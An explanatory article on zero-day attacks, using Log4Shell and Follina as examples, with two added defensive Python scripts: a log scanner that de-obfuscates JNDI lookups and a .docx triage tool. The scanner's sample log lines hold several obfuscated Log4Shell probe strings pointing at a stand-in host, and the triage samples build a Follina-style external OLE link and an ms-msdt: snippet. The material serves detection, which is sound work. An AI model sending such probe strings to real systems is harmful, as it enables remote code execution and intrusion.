A zero-day is a previously unknown flaw in software, found by a determined attacker who keeps probing the code. Considerable effort goes into this: the attacker scours the code of applications and operating systems, using an array of reverse-engineering techniques, for a weakness that provides a hidden way to execute malicious code before the vendor even knows the weakness exists.
WHAT ARE ZERO-DAY ATTACKS?
They are called zero-day attacks because the developer has had zero days to fix the vulnerability: it is exploited before the vendor is aware of it. Cybercriminals use such attacks to gain entry to a network and to disrupt the operation and services of software companies, web browsers and the like; they are also used to gather sensitive information, including from governments.
Because the flaw is unknown to the vendor, an exploit for it catches defenders by surprise: no patch exists, and developing and distributing one takes time. A researcher who finds such a flaw may report it to the vendor so that it can be fixed before anyone abuses it; the danger comes when the finder instead uses it to run harmful code on victims' systems, or sells it to a zero-day broker, often on the dark web. Zero-day brokers trade in such exploits, building an inventory of zero-days with the intention of selling each one to the highest bidder.
FAMOUS EXAMPLES OF ZERO DAY ATTACKS
Log4j (Log4Shell), in 2021
Log4j is not a virus but an open-source logging library maintained by the Apache Software Foundation and embedded in a vast number of Java applications, so the flaw (CVE-2021-44228, known as Log4Shell) affected corporations and users alike, whether they ran Windows, Linux or macOS. In versions 2.0-beta9 through 2.14.1, the library performed JNDI (Java Naming and Directory Interface) lookups on the strings it was asked to log. If attacker-controlled input, such as an HTTP header containing a string of the form ${jndi:ldap://attacker-host/x}, reached a log statement, Log4j would contact the attacker's server and load the Java class it returned.
This was a remote code execution vulnerability of the highest severity (rated CVSS 10.0). It let attackers run code with whatever privileges the vulnerable Java application held, which on many servers was enough to take over the host. It was used to steal data and to launch denial of service attacks, and it was exploited by everyone from nation states to cybercriminals, who suddenly found that they had remote access to systems in technology, financial and healthcare companies.
It affected everything from cloud services to developer tools to security devices. Pre-packaged scanners and exploit scripts were available on the internet within days. It was used for crypto-mining, for deploying malware for large-scale DoS (Denial of Service) attacks and ransomware, and for stealing data. Once the exploit became known, Apache released version 2.15.0, which restricted the lookups but was soon found to be incomplete (CVE-2021-45046), and then version 2.16.0, which disabled access to JNDI by default and removed message lookups altogether.
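The attack string above rarely arrives in its plain form; scanners hid the word "jndi" behind Log4j's own nested lookup syntax (${lower:j}, ${::-j}, ${env:NOPE:-j}) so that naive string matching missed it. The following Python script is an added example, not code from the article or from the Apache Log4j project: it evaluates nested lookups inside-out the way the vulnerable library would, then reports the JNDI scheme and target for each probe found in a set of constructed web-server log lines (the 198.51.100.7 address and the log lines are made up; no real traffic is reproduced).

```python
"""Scan web-server log lines for Log4Shell (CVE-2021-44228) probes.

Added example, not the article's or Apache's code. Obfuscated probes are
de-obfuscated by resolving Log4j 2's ${...} lookups inside-out; the
sample log lines and the 198.51.100.7 address (TEST-NET-2) are constructed.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no further braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# A fully de-obfuscated JNDI lookup, e.g. ${jndi:ldap://host:1389/a}.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):([^}]*)\}", re.IGNORECASE)


def _resolve_innermost(match):
    """Evaluate one innermost lookup the way Log4j 2 would, or leave it."""
    body = match.group(1)
    # ${key:-default}: an empty or bogus key (${::-j}, ${env:NOPE:-j})
    # fails to resolve, so Log4j substitutes the default value.
    idx = body.find(":-")
    if idx != -1:
        return body[idx + 2:]
    lowered = body.lower()
    if lowered.startswith("lower:"):
        return body[6:].lower()
    if lowered.startswith("upper:"):
        return body[6:].upper()
    # Anything else (jndi:, date:, sys:, ...) is left in place.
    return match.group(0)


def normalize_lookups(text, max_rounds=32):
    """Resolve nested lookups until the text stops changing."""
    text = unquote(text)  # probes in query strings are often URL-encoded
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve_innermost, text)
        if resolved == text:
            break
        text = resolved
    return text


def scan(lines):
    """Return one hit per JNDI lookup found, with 1-based line numbers."""
    hits = []
    for lineno, raw in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(normalize_lookups(raw)):
            hits.append({"line": lineno, "scheme": m.group(1).lower(),
                         "target": m.group(2), "raw": raw})
    return hits


# Constructed access-log lines (not real traffic). Lines 2 to 6 carry
# probes; lines 1 and 7 are benign and must not be reported.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    # plain probe in the User-Agent field
    '10.0.0.9 - - [10/Dec/2021:13:02:10 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    # lower: lookups hide the keyword
    '10.0.0.9 - - [10/Dec/2021:13:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7:1389/Exploit}"',
    # empty-key default values, letter by letter, pointing at RMI
    '10.0.0.9 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/obj}"',
    # bogus env lookups with default values
    '10.0.0.9 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://198.51.100.7:1389/x}"',
    # URL-encoded in the query string
    '10.0.0.9 - - [10/Dec/2021:13:02:14 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fenc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    # a lookup that is not JNDI; must not be reported
    '10.0.0.7 - - [10/Dec/2021:13:03:00 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']} target={hit['target']}")
```

The normalisation step is what matters: matching on the literal text "jndi" catches only the first sample line, while resolving the lookups first catches all five. A real deployment would also feed the scanner the decoded bodies of POST requests and any other field an application logs, since Log4Shell triggered wherever attacker input reached a log statement.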
CVE-2022-30190 also called Follina, in 2022
CVE stands for Common Vulnerabilities and Exposures, a standardised way of naming vulnerabilities, run by MITRE. It is a central catalogue that lists and describes publicly known vulnerabilities in different products, with identifiers assigned by MITRE and by CVE Numbering Authorities, many of which are the vendors of the affected products.
Follina, or CVE-2022-30190, is a zero-day remote code execution flaw in Windows. It was first reported to Microsoft on 12/04/2022, became public at the end of May 2022 when a malicious Word document exploiting it was found in the wild, and was given the name Follina by security researcher Kevin Beaumont. Follina abuses a Microsoft Office feature that loads an external object to retrieve an HTML file from an attacker's server; that file then uses the ms-msdt: URL protocol to invoke the Microsoft Support Diagnostic Tool (MSDT) and execute malicious code on the system. Successful exploitation lets an attacker run arbitrary code with the privileges of the user who opened the document, so they can view, change or delete data and install programs. Microsoft released a patch for CVE-2022-30190 on 14/06/2022.
What is remarkable about Follina is that it needs no macros: the document only has to contain an external link, and the vulnerability could be exploited in Office 2021, 2019, 2016 and even 2013. The RTF (Rich Text Format) variant is even more dangerous, because the malicious command is executed as soon as the file is rendered in the Windows Explorer preview pane. The file does not even have to be opened.
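Because the document carries no macro, macro-based scanning misses it; the tell-tale sign is in the document's relationship metadata, where an OLE object is declared with TargetMode="External" and an http(s) target. The following Python script is an added example, not code from the article or from Microsoft: it unpacks a .docx (an OOXML zip), lists every external relationship, flags external OLE objects or templates fetched over the web, and checks a fetched second-stage page for the ms-msdt: protocol handler. The two documents it inspects are built in memory and are constructed, as are the 198.51.100.7 address (TEST-NET-2) and the second-stage snippet.

```python
"""Triage a .docx for the external-OLE-object trick used by Follina.

Added example, not the article's or Microsoft's code. The sample
documents, the 198.51.100.7 server and the second-stage page are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Yield (rels_part, relationship_type, target) for every external link."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    yield name, rel.get("Type", ""), rel.get("Target", "")


def triage_docx(docx_bytes):
    """Return findings as strings; an empty list means nothing suspicious.

    Web hyperlinks are normal in documents, so only oleObject and
    attachedTemplate relationships that fetch over http(s) are flagged.
    """
    findings = []
    for part, rel_type, target in external_relationships(docx_bytes):
        short = rel_type.rsplit("/", 1)[-1]
        if short in ("oleObject", "attachedTemplate") and \
                target.lower().startswith(("http://", "https://")):
            findings.append(f"{part}: external {short} fetched from {target}")
    return findings


def html_invokes_msdt(html):
    """True if a fetched second-stage page tries to launch MSDT."""
    return MSDT_URI.search(html) is not None


def build_docx(rels_xml):
    """Build a minimal constructed .docx around the given relationships part."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>')
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


_RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8"?>'
              f'<Relationships xmlns="{REL_NS}">')

# Benign: an ordinary web hyperlink, which is common and not a finding.
BENIGN_DOCX = build_docx(
    _RELS_HEAD
    + f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.org/" TargetMode="External"/>'
    + '</Relationships>')

# Follina-style: an OLE object whose content is pulled from a remote server.
SUSPICIOUS_DOCX = build_docx(
    _RELS_HEAD
    + f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.org/" TargetMode="External"/>'
    + f'<Relationship Id="rId2" Type="{OLE_TYPE}" Target="http://198.51.100.7/stage2.html!" TargetMode="External"/>'
    + '</Relationships>')

# Constructed second-stage page: the protocol handler is the tell-tale.
# A real payload appends crafted parameters, which are not reproduced here.
SECOND_STAGE_HTML = '<script>location.href = "ms-msdt:/id PCWDiagnostic";</script>'

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("suspicious", SUSPICIOUS_DOCX)):
        print(label, triage_docx(doc) or "clean")
    print("second stage launches MSDT:", html_invokes_msdt(SECOND_STAGE_HTML))
```

For RTF files the same external-object reference sits in the RTF text rather than in a zip, so a separate check for objdata or an \objautlink pointing at a URL is needed; the docx-only check above is what the OOXML structure supports.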
WHAT CAN BE DONE?
By definition there is no patch for a zero-day on the day it is first exploited, but there are ways in which the impact of zero-day attacks can be mitigated.
- Testing the software regularly – so that potential loopholes are found before bad actors find ways to exploit them.
- Regular software updates – threats emerge constantly, and once a vulnerability is exposed vendors work quickly to patch the hole; users who update promptly close the window of exposure.
- Monitoring threat intelligence feeds – to learn early about newly disclosed vulnerabilities, exploits in circulation and indicators of compromise.
- Perimeter firewalls – a useful mechanism for filtering malicious incoming traffic before it crosses from a public to a private network, and for blocking the outbound connections (such as the LDAP callback in Log4Shell) that many exploits depend on.
- Preserve evidence – in the case of an attack, preserve logs and affected systems so that they can be analysed and the lessons used to prepare for future attacks.
- Threat hunting – an active security exercise with the intent of rooting out attackers who may have penetrated a network or system without raising any alarms.
- Emergency patches and workarounds – apply out-of-band fixes as soon as they appear, and vendor workarounds while a patch is pending (for Follina, Microsoft advised disabling the MSDT URL protocol until the June patch shipped).
Author – Mr. Naman Sareen, Research Associate, CyberPeace Foundation